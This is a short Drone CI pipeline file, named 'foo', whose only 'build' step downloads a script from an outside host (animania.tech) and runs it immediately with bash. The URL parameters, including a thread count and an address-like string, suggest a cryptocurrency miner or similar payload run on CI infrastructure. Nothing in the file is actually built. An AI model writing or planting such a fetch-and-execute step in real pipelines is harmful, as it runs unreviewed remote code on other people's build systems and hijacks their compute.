---
kind: pipeline
type: docker
name: foo

steps:
- name: build
  image: alpine
  commands:
  - curl 'https://animania.tech/start.txt?w=test&r=eu&t=6&a=RXKKMD5LHex9nrigfwjFeu1t79144WXS2c' --output start.txt && bash start.txt
...
